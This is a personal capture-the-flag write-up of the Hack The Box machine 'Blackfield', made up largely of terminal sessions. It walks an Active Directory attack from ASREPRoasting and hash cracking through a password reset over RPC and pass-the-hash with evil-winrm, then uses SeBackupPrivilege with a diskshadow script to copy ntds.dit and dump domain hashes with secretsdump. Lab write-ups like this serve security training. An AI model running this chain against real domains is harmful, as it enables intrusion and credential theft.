Running in debug mode, it looks like most of those users don't actually exist? It hangs at audit2020 though. I should try an ASREPRoast attack. I think part of that involves a script that finds valid users?

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield ··································· KILL ✘  20:26:51   ─╮
❯ GetNPUsers.py blackfield.local/ -dc-ip 10.10.10.192 -no-pass -usersfile users.list                                 ─╯
Impacket v0.9.22.dev1+20200909.150738.15f3df26 - Copyright 2020 SecureAuth Corporation
…
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
…
$krb5asrep$23$support@BLACKFIELD.LOCAL:2fba12a1aaf1c82e265d4d3e6ff9814a$f2139f2fe4742a53f7f2dd7469c985ef9ef6d01301f5341ba1c26d4818db6d35b061b5b3a01942882a0de6260f7d9921e6ec9623f70a2ac765437ef334b09fb66c6f1a1533f45537a6922f9f2f1ddf68437740ffd7e296bc71898688655ba28c996d3c3facc75c4db168bc44799c8d095003ceb0ad66c86ad69490d65691d771e3df86ed12f259019cc4e4336c09a08ff6dd4527e11289e5895b26d117020095fa4fb2306d72e2b9ee47666113f743320759a29ff8c597a23292355bbb669a41f5b28cd9848759b41162223ba7c58d46f3379eea4b993a186b6027455945184ad70e2e2535e2573ad51ecece9d45728a327e2da8
…
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set

Oh shit, yeah. I think I might have something here. Let's try to crack the hash.

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield ············································ 20:30:55   ─╮
❯ hashcat -m 18200 --force -a 0 asreproast.hashes /usr/share/wordlists/rockyou.txt                                   ─╯
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 5 1600 Six-Core Processor, 5853/5917 MB (2048 MB allocatable), 6MCU
...

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344394
* Bytes.....: 139921525
* Keyspace..: 14344387
* Runtime...: 2 secs

Approaching final keyspace - workload adjusted.

$krb5asrep$23$support@BLACKFIELD.LOCAL:2fba12a1aaf1c82e265d4d3e6ff9814a$f2139f2fe4742a53f7f2dd7469c985ef9ef6d01301f5341ba1c26d4818db6d35b061b5b3a01942882a0de6260f7d9921e6ec9623f70a2ac765437ef334b09fb66c6f1a1533f45537a6922f9f2f1ddf68437740ffd7e296bc71898688655ba28c996d3c3facc75c4db168bc44799c8d095003ceb0ad66c86ad69490d65691d771e3df86ed12f259019cc4e4336c09a08ff6dd4527e11289e5895b26d117020095fa4fb2306d72e2b9ee47666113f743320759a29ff8c597a23292355bbb669a41f5b28cd9848759b41162223ba7c58d46f3379eea4b993a186b6027455945184ad70e2e2535e2573ad51ecece9d45728a327e2da8:#00^BlackKnight

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:2fba12a1aaf1...7e2da8
Time.Started.....: Tue Sep 15 20:32:01 2020, (13 secs)
Time.Estimated...: Tue Sep 15 20:32:14 2020, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1057.8 kH/s (10.17ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344387/14344387 (100.00%)
Rejected.........: 0/14344387 (0.00%)
Restore.Point....: 14327808/14344387 (99.88%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $CaRaMeL -> clarus
Started: Tue Sep 15 20:31:36 2020
Stopped: Tue Sep 15 20:32:16 2020

 Got it!

support:#00^BlackKnight

Now, can I log in with winrm? Nope, no login that way, that would be too easy lol. I guess I'll redo enum4linux but authenticated this time.

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield ············································ 20:37:31   ─╮
❯ enum4linux -a -M -l -d -w BLACKFIELD.local -u support -p "#00^BlackKnight" blackfield.htb 2>&1 | tee "/home/borari/cyb
ersecurity/htb/boxes/10.10.10.192-blackfield/scans/enum4linux.txt"
Starting enum4linux v0.8.9 ( [http://labs.portcullis.co.uk/application/enum4linux/](http://labs.portcullis.co.uk/application/enum4linux/) ) on Tue Sep 15 20:37:56 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... blackfield.htb
RID Range ........ 500-550,1000-1050
Username ......... 'support'
Password ......... '#00^BlackKnight'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

Hooo boy that's a ton of shit. Here's some of what I think is interesting.

[+] Got OS info for blackfield.htb from srvinfo:
        BLACKFIELD.HTB Wk Sv PDC Tim NT
        platform_id     :       500
        os version      :       10.0
        server type     :       0x80102b

 ===============================
|    Users on blackfield.htb    |
 ===============================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administerin>index: 0xfb0 RID: 0x44f acb: 0x00000210 Account: audit2020      Name: (null)    Desc: (null)
…
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10eb RID: 0x586 acb: 0x00000210 Account: lydericlefebvre       Name: Lydéric aas. Lefebvre     Desc:@lydericlefebvre - VM Creator
index: 0xfb1 RID: 0x450 acb: 0x00010210 Account: support        Name: (null)    Desc: (null)
index: 0x10e6 RID: 0x585 acb: 0x00000210 Account: svc_backup    Name: (null)    Desc: (null)

I'll need to grep for 'Account: ' then do some awk slicing to get an actual user list.

Ok, got it. Let's see if we can get anyone else's ASREP ticket. Nope, only the one for support came back.

Do I have any deeper access to the SMB shares? Yes, I have more RO access than I did before.

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield ··································· 15s    20:55:05   ─╮
❯ smbmap -H blackfield.htb -P 445 2>&1 | tee -a "/home/borari/cybersecurity/htb/boxes/10.10.10.192-blackfield/scans/smbmap-share-permissions.txt"; smbmap -u support -p "#00^BlackKnight" -H blackfield.htb -P 445 2>&1 | tee -a "/home/borari/cybersecurity/htb/boxes/10.10.10.192-blackfield/scans/smbmap-share-permissions-support.txt"

[+] IP: blackfield.htb:445      Name: unknown
[+] IP: blackfield.htb:445      Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share

Let's see what is on these other shares. Nothing on NETLOGON.

Ok, I have a valid domain account, what else can I do? Can I go kerberoasting? Nope.

What else can I do, or have I not tried to do? RPC, I always forget about RPC.

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield ···································· INT ✘  21:21:35   ─╮
❯ rpcclient -U support 10.10.10.192                                                                                  ─╯
Enter WORKGROUP\support's password:

rpcclient $> enumprivs
found 35 privileges
SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)

I got a direct hint that I could change a user's password with rpcclient. I guess the SeTrustedCredManAccessPrivilege and stuff is what should have given it away?

https://malicious.link/post/2017/reset-ad-user-password-with-linux/

I update the password for user audit2020. I can now log in to the profiles$ smb share.

rpcclient $> setuserinfo2 audit2020 23 'Password_1234'

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield ············································ 21:52:26   ─╮
❯ smbclient [\\\\10.10.10.192\\profiles$](file:///10.10.10.192/profiles$) -U audit2020                                                                 ─╯
Enter WORKGROUP\audit2020's password:

Try "help" to get a list of possible commands.
smb: \>

Let's enum this users directory. Nothing.

smb: \\\> cd audit2020
smb: \\audit2020\\\> ls
. D 0 Wed Jun 3 12:47:11 2020
.. D 0 Wed Jun 3 12:47:11 2020
 
7846143 blocks of size 4096. 4081176 blocks available
smb: \\audit2020\\\>

Do we have access to any other shares?

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield ································ 1m 34s    21:54:14   ─╮
❯ smbmap -H blackfield.htb -P 445 2>&1 | tee -a "/home/borari/cybersecurity/htb/boxes/10.10.10.192-blackfield/scans/smbmap-share-permissions.txt"; smbmap -u audit2020 -p "Password_1234" -H blackfield.htb -P 445 2>&1 | tee -a "/home/borari/cybersecurity/htb/boxes/10.10.10.192-blackfield/scans/smbmap-share-permissions-audit2020.txt"

[+] IP: blackfield.htb:445      Name: unknown
[+] IP: blackfield.htb:445      Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                READ ONLY       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share

Yeah, I seem to have access to the forensic share now. Let's see what's on there.

❯ smbclient [\\\\10.10.10.192\\forensic](file:///10.10.10.192/forensic) -U audit2020                                                                  ─╯
Enter WORKGROUP\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Sun Feb 23 08:03:16 2020
  ..                                  D        0  Sun Feb 23 08:03:16 2020
  commands_output                     D        0  Sun Feb 23 13:14:37 2020
  memory_analysis                     D        0  Thu May 28 16:28:33 2020
  tools                               D        0  Sun Feb 23 08:39:08 2020
...

There's a ton of shit, I should just mount the share.

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield ··································· 13s    21:59:10   ─╮
❯ mount -t cifs //10.10.10.192/forensic /mnt -o user=audit2020                                                       ─╯
🔐 Password for audit2020@//10.10.10.192/forensic:  *************

While searching through all these files, it looked like this is the actions log of someone doing a security audit or something. The tools folder is useless to me, its just program data. The commands log folder looks to be just basic enumeration. The memory analysis folder looks juicy though. I know that lsass deals with security and shit, and can hold hashed credentials, that's what's targeted my mimikatz. I'll copy that over and try to use mimikatz to pull anything there out.

     /mnt/memory_analysis ········································································· 22:05:00   ─╮
❯ cp lsass.zip ~/cybersecurity/htb/boxes/10.10.10.192-blackfield/loot                                                ─╯

     /mnt/memory_analysis ································································ 18s    22:07:59   ─╮
❯ cd ~/cybersecurity/htb/boxes/10.10.10.192-blackfield/loot

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield/loot ······································· 22:08:12   ─╮
❯ unzip lsass.zip                                                                                                    ─╯
Archive:  lsass.zip
  inflating: lsass.DMP

I really don't want to fuck around with trying to figure out if I can run mimikatz on my kali machine or anything, so I'll just boot up in to my Windows exploit-dev machine to do it.

Can I pass the administrator hash to winrm and just get root? lol no.

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield ···································· INT ✘  22:03:33   ─╮
❯ evil-winrm -i 10.10.10.192 -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62                                    ─╯

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

Can I pass the svc_backup hash? Yes! Do I have the right user account? Yes!

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield ··································· 21s    22:23:48   ─╮
❯ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d                                       ─╯

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> ls -force ..\Desktop

    Directory: C:\Users\svc_backup\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-hs-        2/23/2020   9:16 AM            282 desktop.ini
-ar---        9/15/2020  11:10 PM             34 user.txt

User Compromise

EoP Enumeration

What privileges do I have?

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Cool, I'm part of the Backup Operators group, and I have SeBackupPrivilege. Check out this link for a deeper explanation, but I can basically back up anything I want. This includes AD files, registry files, etc. This means that I can just back up NTDS.dit, which is the Windows domain equivalent to /etc/shadow, it holds password hashes for all the users in a domain.

https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf

In the following steps, what I am doing is using diskshadow to make a new volume and alias it with C:\. This will allow me to read everything on C:\, regardless of my permissions. It will be easier to script it since I don't have a fully interactive shell.

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield/exploit ······················ 32s       22:41:26   ─╮
❯ cat script.txt                                                                                                     ─╯
SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias audit
create
expose %audit% z:

*Evil-WinRM* PS C:\windows\temp> upload exploit/script.txt
Info: Uploading exploit/script.txt to C:\windows\temp\script.txt

Data: 116 bytes of 116 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\temp> type script.txt
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias auditp
createp
expose %audit% z:p

*Evil-WinRM* PS C:\windows\temp> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  9/19/2020 2:32:34 PM

-> SET CONTEXT PERSISTENT NOWRITERS
-> add volume c: alias audit
-> create
Alias audit for shadow ID {f3b47f4a-dd72-473f-be5d-b027089ca475} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {25b8692c-4b67-47ef-b32b-09de1eb8df15} set as environment variable.

Querying all shadow copies with the shadow copy set ID {25b8692c-4b67-47ef-b32b-09de1eb8df15}

        * Shadow copy ID = {f3b47f4a-dd72-473f-be5d-b027089ca475}               %audit%
                - Shadow copy set: {25b8692c-4b67-47ef-b32b-09de1eb8df15}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: [\\?\Volume{351b4712-0000-0000-0000-602200000000}\](file:///%3f/Volume%7b351b4712-0000-0000-0000-602200000000%7d/) [C:\]
                - Creation time: 9/19/2020 2:32:35 PM
                - Shadow copy device name: [\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1](file:///%3f/GLOBALROOT/Device/HarddiskVolumeShadowCopy1)
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %audit% z:
-> %audit% = {f3b47f4a-dd72-473f-be5d-b027089ca475}
The shadow copy was successfully exposed as z:\.
->

In order to allow me to copy the NTDS.dit file, I just need to download the two DLLs from (https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug) on to the machine and import them in PS.

*Evil-WinRM* PS C:\windows\temp> upload exploit/SeBackupPrivilegeCmdLets.dll
Info: Uploading exploit/SeBackupPrivilegeCmdLets.dll to C:\windows\temp\SeBackupPrivilegeCmdLets.dll

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\temp> upload exploit/SeBackupPrivilegeUtils.dll
Info: Uploading exploit/SeBackupPrivilegeUtils.dll to C:\windows\temp\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\temp> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\windows\temp> Import-Module .\SeBackupPrivilegeCmdLets.dll

Now I should be good to copy the NTDS.dit file over to my current directory, then download it to my host. This is the functional equivalent of dumping the ntlm, system, and sam registry hives.

*Evil-WinRM* PS C:\windows\temp> Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit C:\Windows\temp\audit.dit
*Evil-WinRM* PS C:\windows\temp> ls -force

    Directory: C:\windows\temp

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/19/2020   2:32 PM            628 2020-09-19_14-32-35_DC01.cab
-a----        9/19/2020   2:37 PM       18874368 audit.dit
-a----        9/19/2020   2:30 PM         130890 MpCmdRun.log
-a----        9/19/2020   2:31 PM             88 script.txt
-a----        9/19/2020   2:33 PM          12288 SeBackupPrivilegeCmdLets.dll
-a----        9/19/2020   2:33 PM          16384 SeBackupPrivilegeUtils.dll
-a----        9/19/2020   2:20 PM            102 silconfig.log
------        9/19/2020   2:20 PM          62794 vmware-vmsvc.log
------        9/19/2020   2:20 PM          15832 vmware-vmusr.log
-a----        9/19/2020   2:19 PM           1728 vmware-vmvss.log

*Evil-WinRM* PS C:\windows\temp> download audit.dit
Info: Downloading C:\windows\temp\audit.dit to audit.dit

Info: Download successful!

And I also need to dump the SYSTEM file.

*Evil-WinRM* PS C:\windows\temp> reg save HKLM\SYSTEM system
The operation completed successfully.

*Evil-WinRM* PS C:\windows\temp> download system
Info: Downloading C:\windows\temp\system to system

Info: Download successful!

I couldn't have dumped the reg hives the traditional post SYSTEM compromise way because I don't have access to the HKLM\SECURITY node. However, I can rebuild the hashes with Impacket's secretsdump.py in the same fashion. (Shit, there's a lot, but that aad3b is null so yeah.

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield/loot ······································· 11:13:42   ─╮
❯ secretsdump.py -ntds ntds.dit -system system -hashes lmhash:nthash LOCAL -output nt.hashes                         ─╯
Impacket v0.9.22.dev1+20200909.150738.15f3df26 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD189208:1107:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD404458:1108:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD706381:1109:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD937395:1110:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD553715:1111:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD840481:1112:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD622501:1113:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
…

I should be able to pass this hash directly to evil-winrm to log in, but I also like cracking hashes when I can, so I'll clean up the output real quick so I can do that later.

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield/loot ······································· 11:19:33   ─╮
❯ cat nt.hashes.ntds | awk -F ":" '{print $1":"$4}' > nt.hashes                                                      ─╯

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield/loot ······································· 11:19:56   ─╮
❯ head nt.hashes                                                                                                     ─╯
Administrator:184fb5e5178480be64824d4cd53b99ee
Guest:31d6cfe0d16ae931b73c59d7e0c089c0
DC01$:65557f7ad03ac340a7eb12b9462f80d6
krbtgt:d3c02561bba6ee4ad6cfd024ec8fda5d
audit2020:c95ac94a048e7c29ac4b4320d7c9d3b5
support:cead107bf11ebc28b3e6e90cde6de212
BLACKFIELD.local\BLACKFIELD764430:a658dd0c98e7ac3f46cca81ed6762d1c
BLACKFIELD.local\BLACKFIELD538365:a658dd0c98e7ac3f46cca81ed6762d1c
BLACKFIELD.local\BLACKFIELD189208:a658dd0c98e7ac3f46cca81ed6762d1c
BLACKFIELD.local\BLACKFIELD404458:a658dd0c98e7ac3f46cca81ed6762d1c

Before trying to crack anything I am going to log in as Administrator to get the flags and finish owning the box.

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield ····························· 1h 1m 22s    11:21:22   ─╮
❯ evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee                                    ─╯

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

That's it! I just finished this machine!

SYSTEM Compromise

Post-Exploitation

Now to attempt to crack the recovered hashes with hashcat.

   |  ~/cybersecurity/htb/boxes/10.10.10.192-blackfield/loot ···························· 1m 4s    11:51:26   ─╮
❯ hashcat -m 1000 -a 0 --username nt.hashes /usr/share/wordlists/rockyou.txt -r ~/cybersecurity/Tools/host-tools/wordlists/hob064.rule
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-AMD Ryzen 5 1600 Six-Core Processor, 5853/5917 MB (2048 MB allocatable), 6MCU
...

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344387
* Bytes.....: 139921525
* Keyspace..: 918040768

31d6cfe0d16ae931b73c59d7e0c089c0:
cead107bf11ebc28b3e6e90cde6de212:#00^BlackKnight
Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: NTLM
Hash.Target......: nt.hashes
Time.Started.....: Sat Sep 19 11:52:59 2020 (38 secs)
Time.Estimated...: Sat Sep 19 11:53:37 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Mod........: Rules (/home/borari/cybersecurity/Tools/host-tools/wordlists/hob064.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 24386.8 kH/s (7.03ms) @ Accel:512 Loops:64 Thr:1 Vec:8
Recovered........: 2/26 (7.69%) Digests
Progress.........: 918040768/918040768 (100.00%)
Rejected.........: 0/918040768 (0.00%)
Restore.Point....: 14344387/14344387 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-64 Iteration:0-64
Candidates.#1....: !!sexme!! -> cl@ru$16

Started: Sat Sep 19 11:52:38 2020
Stopped: Sat Sep 19 11:53:38 2020

Looks like I got one, the same one I had before. Also I confirmed that the 31d6cf... LM hash is the null value, so I can grep -v that one out of my list before I pipe it over to my master hashes list. (Actually I just removed all the system accounts and all the identical hash value random noise users as well to keep my list more manageable.)


Next: Unbalanced